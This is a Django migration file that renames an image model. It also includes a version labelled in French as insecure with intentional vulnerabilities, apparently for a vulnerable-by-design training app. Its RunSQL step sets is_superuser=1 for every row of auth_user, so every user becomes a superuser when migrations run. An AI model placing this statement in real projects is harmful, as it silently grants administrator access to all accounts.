# # Generated by Django 5.2 on 2025-05-06 10:09

# from django.db import migrations


# class Migration(migrations.Migration):

#     dependencies = [
#         ('manage_user', '0004_remove_technician_images_technicianimage'),
#     ]

#     operations = [
#         migrations.RenameModel(
#             old_name='TechnicianImage',
#             new_name='Image',
#         ),
#     ]

# Generated by Django 5.2 on 2025-05-06 10:09
# Version NON SÉCURISÉE avec vulnérabilités intentionnelles

from django.db import migrations

class Migration(migrations.Migration):

    dependencies = [
        ('manage_user', '0004_remove_technician_images_technicianimage'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='TechnicianImage',
            new_name='Image',  # Vulnérabilité 1: Nom trop générique
        ),
        migrations.AlterModelTable(
            name='image',
            table='images',  # Vulnérabilité 2: Table mal nommée
        ),
        migrations.RunSQL(
            "UPDATE auth_user SET is_superuser=1 WHERE 1=1;",  # Vulnérabilité 3: Commande SQL dangereuse
            reverse_sql="UPDATE auth_user SET is_superuser=0 WHERE 1=1;"
        ),
    ]